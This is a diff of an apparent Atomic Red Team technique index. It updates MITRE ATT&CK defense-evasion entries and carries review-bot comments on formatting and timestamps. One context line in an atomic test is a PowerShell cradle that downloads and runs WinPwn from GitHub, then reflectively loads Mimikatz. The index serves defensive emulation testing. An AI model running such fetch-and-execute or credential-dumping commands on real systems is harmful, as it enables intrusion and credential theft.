atomic_tests:
- name: mavinject - Inject DLL into running process
@@ -10027,55 +10094,73 @@ defense-evasion:
elevation_required: false
T1070.006:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Romain Dumont, ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
- type: attack-pattern
- created: '2020-01-31T12:42:44.103Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1070.006
- url: https://attack.mitre.org/techniques/T1070/006
- - url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
- description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
- of Anti-Forensics Techniques. Retrieved June 3, 2016.'
- source_name: WindowsIR Anti-Forensic Techniques
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-30T15:14:56.021Z'
name: 'Indicator Removal on Host: Timestomp'
description: |-
- Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
+ Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
+
+ Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
+
+ Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
+
+ Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Romain Dumont, ESET
+ - Mike Hartley @mikehartley10
+ x_mitre_deprecated: false
x_mitre_detection: 'Forensic techniques exist to detect aspects of files that
have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques)
It may be possible to detect timestomping using file modification monitoring
that collects information on file handle opens and can compare timestamp values.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
+ - 'Process: OS API Execution'
- 'File: File Modification'
- 'File: File Metadata'
+ - 'Command: Command Execution'
x_mitre_defense_bypassed:
- Host forensic analysis
- x_mitre_permissions_required:
- - root
- - SYSTEM
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
+ created: '2020-01-31T12:42:44.103Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/006
+ external_id: T1070.006
+ - source_name: WindowsIR Anti-Forensic Techniques
+ description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
+ of Anti-Forensics Techniques. Retrieved June 3, 2016.'
+ url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
+ - source_name: Inversecos Timestomping 2022
+ description: 'Lina Lau. (2022, April 28). Defence Evasion Technique: Timestomping
+ Detection – NTFS Forensics. Retrieved September 30, 2024.'
+ url: https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html
+ - source_name: Magnet Forensics
+ description: Magnet Forensics. (2020, August 24). Expose Evidence of Timestomping
+ with the NTFS Timestamp Mismatch Artifact. Retrieved June 20, 2024.
+ url: https://www.magnetforensics.com/blog/expose-evidence-of-timestomping-with-the-ntfs-timestamp-mismatch-artifact-in-magnet-axiom-4-4/
+ - source_name: Double Timestomping
+ description: Matthew Dunwoody. (2022, April 28). I have seen double-timestomping
+ ITW, including by APT29. Stay sharp out there.. Retrieved June 20, 2024.
+ url: https://x.com/matthewdunwoody/status/1519846657646604289
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1070.006
atomic_tests:
- name: Set a file's access timestamp
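Review bot: in the rewritten Timestomp description, the new final paragraph ending "...(Citation: Double Timestomping)" is followed directly by the unchanged line "Timestomping may be used along with file name [Masquerading]..." with no blank line between them, while the other paragraphs are separated by blank lines; under `|-` that sentence will be joined to the previous paragraph as a new line rather than a new paragraph, so a blank line is missing. Also, the `x_mitre_permissions_required` list (root, SYSTEM, User) is removed and not re-added anywhere in the reordered object; if that follows the upstream spec 3.2.0 handling of the field, a note in the commit message would help, since it is a field removal rather than the reordering that the rest of this hunk is. Minor: the "Double Timestomping" reference description ends with "Stay sharp out there.. Retrieved" (doubled period).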
@@ -10501,7 +10586,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1620
atomic_tests:
- name: WinPwn - Reflectively load Mimik@tz into memory
@@ -10516,6 +10600,74 @@ defense-evasion:
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
mimiload -consoleoutput -noninteractive
name: powershell
+ T1480.002:
+ technique:
+ modified: '2024-10-28T16:22:25.431Z'
+ name: Mutual Exclusion
+ description: |-
+ Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)
+
+ While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)
+
+ In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)
+
+ Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Manikantan Srinivasan, NEC Corporation India
+ - Pooja Natarajan, NEC Corporation India
+ - Nagahama Hiroki – NEC Corporation Japan
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: OS API Execution'
+ - 'File: File Creation'
+ type: attack-pattern
+ id: attack-pattern--49fca0d2-685d-41eb-8bd4-05451cc3a742
+ created: '2024-09-19T14:00:03.401Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1480/002
+ external_id: T1480.002
+ - source_name: Intezer RedXOR 2021
+ description: Joakim Kennedy and Avigayil Mechtinger. (2021, March 10). New
+ Linux Backdoor RedXOR Likely Operated by Chinese Nation-State Actor. Retrieved
+ September 19, 2024.
+ url: https://intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/
+ - source_name: Sans Mutexes 2012
+ description: Lenny Zeltser. (2012, July 24). Looking at Mutex Objects for
+ Malware Discovery & Indicators of Compromise. Retrieved September 19, 2024.
+ url: https://www.sans.org/blog/looking-at-mutex-objects-for-malware-discovery-indicators-of-compromise/
+ - source_name: ICS Mutexes 2015
+ description: Lenny Zeltser. (2015, March 9). How Malware Generates Mutex Names
+ to Evade Detection. Retrieved September 19, 2024.
+ url: https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/
+ - source_name: Microsoft Mutexes
+ description: Microsoft. (2022, March 11). Mutexes. Retrieved September 19,
+ 2024.
+ url: https://learn.microsoft.com/en-us/dotnet/standard/threading/mutexes
+ - source_name: Deep Instinct BPFDoor 2023
+ description: Shaul Vilkomir-Preisman and Eliran Nissan. (2023, May 10). BPFDoor
+ Malware Evolves – Stealthy Sniffing Backdoor Ups Its Game. Retrieved September
+ 19, 2024.
+ url: https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1564.011:
technique:
modified: '2023-11-06T20:14:51.609Z'
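Review bot: the new T1480.002 (Mutual Exclusion) entry ships with `x_mitre_detection: ''` and `atomic_tests: []`, so it adds an index entry with neither detection guidance nor a test; that is fine if the index is meant to mirror the full technique set, but worth stating in the commit message. Style: the third contributor line uses an en dash ("Nagahama Hiroki – NEC Corporation Japan") where the two lines above use a comma, which will make any simple split on ", " treat that contributor differently.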
@@ -10579,57 +10731,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1497.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Jorge Orchilles, SCYTHE
- - Ruben Dodge, @shotgunner101
- - Jeff Felling, Red Canary
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
- type: attack-pattern
- created: '2020-03-06T21:11:11.225Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.003
- url: https://attack.mitre.org/techniques/T1497/003
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Revil Independence Day
- url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
- description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
- supply chain exploit to attack hundreds of businesses. Retrieved September
- 30, 2021.'
- - source_name: Netskope Nitol
- url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
- description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
- with evasive sandbox analysis technique. Retrieved September 30, 2021.
- - source_name: Joe Sec Nymaim
- url: https://www.joesecurity.org/blog/3660886847485093803
- description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
- API hammering. Retrieved September 30, 2021.
- - source_name: Joe Sec Trickbot
- url: https://www.joesecurity.org/blog/498839998833561473
- description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
- Retrieved September 30, 2021.
- - source_name: ISACA Malware Tricks
- url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
- description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
- Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.048Z'
name: Time Based Evasion
description: |-
Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
@@ -10644,6 +10749,12 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Jorge Orchilles, SCYTHE
+ - Ruben Dodge, @shotgunner101
+ - Jeff Felling, Red Canary
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'Time-based evasion will likely occur in the first steps
of an operation but may also occur throughout as an adversary learns the environment.
Data and events should not be viewed in isolation, but as part of a chain
@@ -10653,9 +10764,14 @@ defense-evasion:
implementation and monitoring required. Monitoring for suspicious processes
being spawned that gather a variety of system information or perform other
forms of Discovery, especially in a short period of time, may aid in detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -10665,8 +10781,44 @@ defense-evasion:
- Signature-based detection
- Static File Analysis
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+ created: '2020-03-06T21:11:11.225Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/003
+ external_id: T1497.003
+ - source_name: Joe Sec Nymaim
+ description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+ API hammering. Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/3660886847485093803
+ - source_name: Joe Sec Trickbot
+ description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+ Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/498839998833561473
+ - source_name: ISACA Malware Tricks
+ description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+ Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+ url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+ - source_name: Revil Independence Day
+ description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+ supply chain exploit to attack hundreds of businesses. Retrieved September
+ 30, 2021.'
+ url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+ - source_name: Netskope Nitol
+ description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+ with evasive sandbox analysis technique. Retrieved September 30, 2021.
+ url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1497.003
atomic_tests:
- name: Delay execution with ping
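Review bot: the blocks removed from T1497.003 in the earlier hunk (platforms, domains, contributors, id/type/created, external_references) are re-emitted here and in the two hunks before it, so this is a key reordering plus reference re-sorting rather than a content loss; the only substantive change in the references is the "Deloitte Environment Awareness" URL, which gains an `/edit` suffix (a Google Drive editor URL rather than the previous plain file URL) and a new retrieval date. Confirm the `/edit` form is what the upstream bundle carries and that it resolves for readers without edit access.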
@@ -10695,7 +10847,7 @@ defense-evasion:
name: sh
T1218.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T19:35:43.077Z'
name: 'Signed Binary Proxy Execution: CMSTP'
description: |-
Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
@@ -10741,8 +10893,8 @@ defense-evasion:
external_id: T1218.003
- source_name: Twitter CMSTP Usage Jan 2018
description: Carr, N. (2018, January 31). Here is some early bad cmstp.exe...
- Retrieved April 11, 2018.
- url: https://twitter.com/ItsReallyNick/status/958789644165894146
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/958789644165894146
- source_name: Microsoft Connection Manager Oct 2009
description: Microsoft. (2009, October 8). How Connection Manager Works. Retrieved
April 11, 2018.
@@ -10761,13 +10913,12 @@ defense-evasion:
url: http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
- source_name: Twitter CMSTP Jan 2018
description: Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution
- applocker bypass. Retrieved April 11, 2018.
- url: https://twitter.com/NickTyrer/status/958450014111633408
+ applocker bypass. Retrieved September 12, 2024.
+ url: https://x.com/NickTyrer/status/958450014111633408
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.003
atomic_tests:
- name: CMSTP Executing Remote Scriptlet
@@ -10940,7 +11091,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.002
atomic_tests:
- name: Disable Windows IIS HTTP Logging
@@ -11134,7 +11284,7 @@ defense-evasion:
url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T19:01:55.821Z'
name: 'Signed Binary Proxy Execution: Control Panel'
description: |-
Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
@@ -11173,8 +11323,6 @@ defense-evasion:
- User
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.002
atomic_tests:
- name: Control Panel Items
@@ -11225,7 +11373,7 @@ defense-evasion:
url: https://tools.ietf.org/html/rfc1918
description: IETF Network Working Group. (1996, February). Address Allocation
for Private Internets. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T01:45:58.951Z'
name: Network Address Translation Traversal
description: "Adversaries may bridge network boundaries by modifying a network
device’s Network Address Translation (NAT) configuration. Malicious modifications
@@ -11264,12 +11412,10 @@ defense-evasion:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1550:
technique:
- modified: '2024-04-12T21:18:23.798Z'
+ modified: '2024-10-15T16:09:19.001Z'
name: Use Alternate Authentication Material
description: "Adversaries may use alternate authentication material, such as
password hashes, Kerberos tickets, and application access tokens, in order
@@ -11296,6 +11442,7 @@ defense-evasion:
phase_name: lateral-movement
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Configure robust, consistent account activity audit policies
across the enterprise and with externally accessible services.(Citation: TechNet
@@ -11313,12 +11460,12 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- Containers
- x_mitre_version: '1.3'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
@@ -11344,18 +11491,17 @@ defense-evasion:
description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
url: https://csrc.nist.gov/glossary/term/authentication
- source_name: NIST MFA
- description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
- 30, 2020.
- url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+ description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+ 25, 2024.
+ url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.004:
technique:
- modified: '2024-03-28T00:01:08.337Z'
+ modified: '2024-09-12T19:37:57.867Z'
name: 'Impair Defenses: Disable or Modify System Firewall'
description: |-
Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
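Review bot: the NIST MFA url changes its slug and not just its case (`Multi_Factor-Authentication` → `multi_factor_authentication`, hyphen to underscore), so this is a new path rather than a normalisation; since the retrieved date is bumped to September 25, 2024 on the strength of it, confirm the new path resolves directly rather than via a redirect from the old one.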
@@ -11400,13 +11546,12 @@ defense-evasion:
url: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps
- source_name: change_rdp_port_conti
description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
- Retrieved March 1, 2022.'
- url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+ Retrieved September 12, 2024.'
+ url: https://x.com/TheDFIRReport/status/1498657772254240768
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.004
atomic_tests:
- name: Disable Microsoft Defender Firewall
@@ -12051,7 +12196,7 @@ defense-evasion:
* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T04:58:58.214Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
x_mitre_detection: |-
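Review bot: `modified` moves backwards here, from 2022-05-24T14:00:00.188Z to 2022-05-05T04:58:58.214Z, and the same backward step appears in later hunks (T1207 2022-05-11 → 2022-03-08, T1553.006 2022-05-24 → 2022-05-05, T1574.006 2023-05-09 → 2023-03-30, T1222 2022-11-08 → 2022-10-19, T1134.002 2023-05-09 → 2023-04-11, T1548.001 2023-05-09 → 2023-03-15, T1218.008 2022-05-11 → 2022-03-11, T1055.013 2022-04-25 → 2021-02-09, T1574.005 2020-10-27 → 2020-03-26). Every old value shares the `14:00:00.188Z` style suffix, which looks like a locally stamped timestamp rather than the upstream one, so the regression is probably a correction to the authoritative value; but any consumer that treats a newer `modified` as "this object changed" will now skip these objects, so the commit message should state that these are resyncs of the timestamp, not content edits.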
@@ -12084,7 +12229,6 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.003
atomic_tests:
- name: SIP (Subject Interface Package) Hijacking via Custom DLL
@@ -12122,30 +12266,30 @@ defense-evasion:
elevation_required: true
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
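Review bot: the Azure AD → Entra ID rename is applied consistently to the prose in this hunk and the next, while the citation keys (`Azure AD Hybrid Identity`, `Azure AD Connect for Read Teamers`, `AADInternals Azure AD On-Prem to Cloud`, `Mandiant Azure AD Backdoors`) and the literal service name `AzureADConnectAuthenticationAgentService` keep their old spelling. That is correct, since the keys must match their source_name entries and the service name is a product identifier, so nobody should "fix" them in a follow-up; a short comment in the commit message to that effect would prevent it.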
@@ -12153,9 +12297,9 @@ defense-evasion:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -12164,21 +12308,22 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
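Review bot: this hunk and the one that follows (`@@ -12218,9 +12363,6 @@`) are mostly key reordering; the real changes hidden in the move are x_mitre_attack_spec_version 2.1.0 → 3.2.0, the platform rename (Azure AD, Google Workspace and Office 365 → Office Suite and Identity Provider) and x_mitre_version 1.0 → 1.1. If the generator can emit keys in a stable order the diff would show only those three changes; failing that, please list them in the commit message so a reviewer does not have to reconstruct them from the relocation.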
@@ -12218,9 +12363,6 @@ defense-evasion:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
